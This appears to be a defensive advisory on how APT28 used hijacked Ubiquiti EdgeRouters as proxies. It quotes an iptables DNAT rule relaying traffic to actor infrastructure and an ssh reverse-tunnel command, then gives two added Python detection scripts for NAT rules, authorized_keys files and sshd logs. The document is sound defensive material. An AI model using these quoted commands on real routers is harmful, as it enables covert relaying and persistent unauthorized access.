Proxy and Tunnel: Ubiquiti's Unofficial Features
APT28 actors have been using compromised Ubiquiti EdgeRouters to establish proxy connections and reverse SSH tunnels to their dedicated infrastructure. This allows them to maintain persistent access and control over the compromised devices, even after password changes or other mitigation attempts.
Reverse Proxy Connections
APT28 actors have utilized iptables rules on EdgeRouters to establish reverse proxy connections to their dedicated infrastructure. Network defenders and users can review iptables chains and Bash histories on EdgeRouters for unusual invocations, such as the following example:
iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -j DNAT --to-destination <APT28 dedicated infrastructure>:10081
This rule rewrites the destination of TCP connections arriving at the EdgeRouter's own address on port 4443 so that they are handed to APT28 dedicated infrastructure on port 10081; the router becomes a relay for third-party traffic. A relay of this kind normally also needs a matching POSTROUTING rule (SNAT or MASQUERADE) for the return path, so both chains of the nat table should be reviewed, and a rule that is present in the live ruleset but absent from the device's saved configuration is itself a finding, since rules added interactively do not survive a reboot unless the actor also persisted them.
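As an added example (not part of this advisory and not an official tool), the following Python script applies the review described above to text already collected from a device: it parses iptables-save style nat-table output and Bash history lines, recognises both the `-A` form written by `iptables-save` and the `-I` form typed interactively, and flags PREROUTING DNAT rules whose `--to-destination` lies outside local/private address space. The sample rules, history lines and addresses (192.0.2.10 for the router, 203.0.113.7 for actor infrastructure) are constructed documentation-range placeholders, not indicators from the advisory.

```python
"""Flag DNAT relays in EdgeRouter NAT rules and shell history (added example).

Input is iptables-save style text (e.g. from `iptables-save -t nat` on the
device) or the lines of a Bash history file. A PREROUTING DNAT whose
--to-destination points outside local/private address space means the router
is forwarding inbound connections to a third party.
"""
import ipaddress
import shlex

# Constructed sample of `iptables-save -t nat` output. 192.0.2.10 stands in for
# the router's address and 203.0.113.7 for actor-controlled infrastructure;
# both are documentation ranges, not real indicators.
NAT_TABLE = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -d 192.0.2.10/32 -p tcp -m tcp --dport 4443 -j DNAT --to-destination 203.0.113.7:10081
-A PREROUTING -d 192.0.2.10/32 -p tcp -m tcp --dport 8443 -j DNAT --to-destination 10.0.0.5:443
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
"""

# Constructed sample of /root/.bash_history on the same device.
BASH_HISTORY = """\
show interfaces
iptables -t nat -I PREROUTING -d 192.0.2.10 -p tcp -m tcp --dport 4443 -j DNAT --to-destination 203.0.113.7:10081
ls -la /root/.ssh
"""

LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]


def parse_dnat(line):
    """Extract chain, --dport and --to-destination from an iptables rule line.

    Returns None for anything that is not a DNAT rule (table headers, COMMIT,
    unrelated commands in a history file). Both `-A CHAIN` (save format) and
    `-I CHAIN` (interactive insert) are recognised.
    """
    try:
        toks = shlex.split(line)
    except ValueError:            # unbalanced quote in a history line
        toks = line.split()
    if "DNAT" not in toks:
        return None
    rule = {"chain": None, "dport": None, "to": None, "raw": line.strip()}
    for i, tok in enumerate(toks[:-1]):
        nxt = toks[i + 1]
        if tok in ("-A", "-I"):
            rule["chain"] = nxt
        elif tok == "--dport":
            rule["dport"] = nxt
        elif tok == "--to-destination":
            rule["to"] = nxt
    return rule


def is_external(host):
    """True if the DNAT target is not a local/private IPv4 address (a hostname
    can never be a local redirect and is treated as external)."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True
    return not any(addr in net for net in LOCAL_NETS)


def find_dnat_relays(text):
    """Return (chain, dport, target_host, target_port, raw_line) for each
    PREROUTING DNAT rule that hands inbound traffic to an external host."""
    hits = []
    for line in text.splitlines():
        rule = parse_dnat(line)
        if not rule or not rule["to"] or rule["chain"] != "PREROUTING":
            continue
        # IPv4 target of the form addr or addr:port (ip6tables uses [addr]:port,
        # which this example does not handle)
        host, sep, port = rule["to"].rpartition(":")
        if not sep:
            host, port = rule["to"], None
        if is_external(host):
            hits.append((rule["chain"], rule["dport"], host, port, rule["raw"]))
    return hits


if __name__ == "__main__":
    for source, text in (("nat table", NAT_TABLE), ("bash history", BASH_HISTORY)):
        for chain, dport, host, port, raw in find_dnat_relays(text):
            print(f"[{source}] {chain} dport {dport} -> {host}:{port} | {raw}")
```

On a live device the input would come from `iptables-save -t nat` (or `iptables -t nat -S`) and from the history files of root and any other shell users; the internal forward to 10.0.0.5 in the sample is deliberately left unflagged so that legitimate port forwards do not drown the finding.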
Reverse SSH Tunnels
Additionally, APT28 actors have uploaded adversary-controlled SSH RSA public keys to compromised EdgeRouters (as authorized_keys entries) to establish reverse SSH tunnels. Because key-based logins do not depend on the account password, these tunnels allow the actors to access the compromised devices even after password changes or other mitigation attempts.
Network defenders and users can review the following directories on EdgeRouters for unknown RSA keys:
/root/.ssh/
/home/<user>/.ssh/
An unknown key in an authorized_keys file in these directories may indicate that adversaries have used it to access the EdgeRouter, bypassing password authentication; rotating passwords alone does not revoke such access, so the key itself must be removed.
Furthermore, network defenders can query network traffic logs on EdgeRouters to identify abnormal SSH sessions. An invocation of a reverse SSH tunnel used by APT28 actors is provided below:
ssh -i <RSA key> -p <port> root@<router IP address> -R <router IP address>:<port>
This command logs into the EdgeRouter as root with the uploaded RSA key (-i) rather than a password, over a chosen SSH port (-p), and requests a remote port forward (-R), giving the actors a tunnel between the device and their infrastructure that persists across password changes. Key-based root logins from unexpected sources, on an unexpected port, or sessions that leave a forwarded listener on the device are the signals to look for.
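The following Python script is an added example, not advisory content and not an official Ubiquiti tool; it implements the two checks above. It parses each authorized_keys entry, computes the SHA256 fingerprint of the key blob the way `ssh-keygen -lf` reports it, and reports entries whose fingerprint is not on a known-key allowlist or whose embedded key type disagrees with the declared type. It then scans sshd "Accepted publickey" log lines (syslog format) for logins whose fingerprint is outside the same allowlist, which is how a login with an uploaded key shows up in the device's logs. The keys (synthetic moduli of realistic size), the allowlist, the log lines and the address 203.0.113.7 are all constructed for the example.

```python
"""Audit authorized_keys entries and sshd key logins against known fingerprints
(added example). Fingerprints follow `ssh-keygen -lf`: SHA256 of the wire-format
public key blob, base64 without padding, so an existing key inventory can feed
the allowlist directly."""
import base64
import hashlib
import re
import struct


def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def _mpint(n):
    # RFC 4251 mpint: big-endian, leading zero byte when the high bit is set
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def rsa_public_blob(e, n):
    """Wire-format ssh-rsa public key (RFC 4253 section 6.6)."""
    return _ssh_string(b"ssh-rsa") + _mpint(e) + _mpint(n)


def fingerprint(blob):
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


KEY_LINE = re.compile(
    r"^(?:(?P<opts>\S.*?)\s+)?"
    r"(?P<type>ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp(?:256|384|521))\s+"
    r"(?P<b64>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$")


def parse_authorized_key(line):
    """Parse one authorized_keys line; None if it is malformed."""
    m = KEY_LINE.match(line.strip())
    if not m:
        return None
    try:
        blob = base64.b64decode(m["b64"], validate=True)
        (tlen,) = struct.unpack(">I", blob[:4])
        declared = blob[4:4 + tlen].decode("ascii", errors="replace")
    except (ValueError, struct.error):
        return None
    return {"options": m["opts"] or "", "type": m["type"],
            "comment": m["comment"] or "", "fingerprint": fingerprint(blob),
            # the key type inside the blob must agree with the type field
            "type_matches": declared == m["type"]}


def audit_authorized_keys(text, known_fps):
    """Return (line_no, finding, detail) for every entry that is not a known key."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        key = parse_authorized_key(line)
        if key is None:
            findings.append((no, "unparseable", line.strip()))
        elif not key["type_matches"]:
            findings.append((no, "type-mismatch", key["fingerprint"]))
        elif key["fingerprint"] not in known_fps:
            findings.append((no, "unknown-key", key["fingerprint"]))
    return findings


ACCEPTED = re.compile(r"Accepted publickey for (?P<user>\S+) from (?P<src>\S+) "
                      r"port (?P<port>\d+) ssh2: \S+ (?P<fp>SHA256:\S+)")


def audit_auth_log(text, known_fps):
    """Return (user, source_ip, fingerprint) for key logins not on the allowlist."""
    return [(m["user"], m["src"], m["fp"])
            for m in map(ACCEPTED.search, text.splitlines())
            if m and m["fp"] not in known_fps]


def b64(blob):
    return base64.b64encode(blob).decode()


# Constructed sample data: synthetic 2048-bit moduli (not real keys) and a
# documentation address (203.0.113.7) standing in for actor infrastructure.
KNOWN_BLOB = rsa_public_blob(65537, (1 << 2047) | 0x10001)
ROGUE_BLOB = rsa_public_blob(65537, (1 << 2047) | 0x8BADF00D)
KNOWN_FPS = {fingerprint(KNOWN_BLOB)}            # the provisioned admin key
AUTHORIZED_KEYS = "\n".join([
    "# admin key provisioned 2023-11",
    f"ssh-rsa {b64(KNOWN_BLOB)} admin@mgmt",
    f"ssh-rsa {b64(ROGUE_BLOB)}",                  # never provisioned, no comment
    f"ssh-ed25519 {b64(KNOWN_BLOB)} mislabelled",  # blob actually says ssh-rsa
])
AUTH_LOG = "\n".join([
    "Feb 12 03:14:07 edgerouter sshd[2841]: Accepted publickey for root "
    f"from 203.0.113.7 port 51322 ssh2: RSA {fingerprint(ROGUE_BLOB)}",
    "Feb 12 08:02:11 edgerouter sshd[3120]: Accepted publickey for ubnt "
    f"from 192.168.1.20 port 40110 ssh2: RSA {fingerprint(KNOWN_BLOB)}",
])

if __name__ == "__main__":
    for finding in audit_authorized_keys(AUTHORIZED_KEYS, KNOWN_FPS):
        print("authorized_keys:", finding)
    for hit in audit_auth_log(AUTH_LOG, KNOWN_FPS):
        print("auth log:", hit)
```

The allowlist is keyed on fingerprints rather than on comments or file names because an actor can label a key anything; a type mismatch is reported separately because it means the line was hand-edited rather than written by ssh-keygen, which is worth a look on its own.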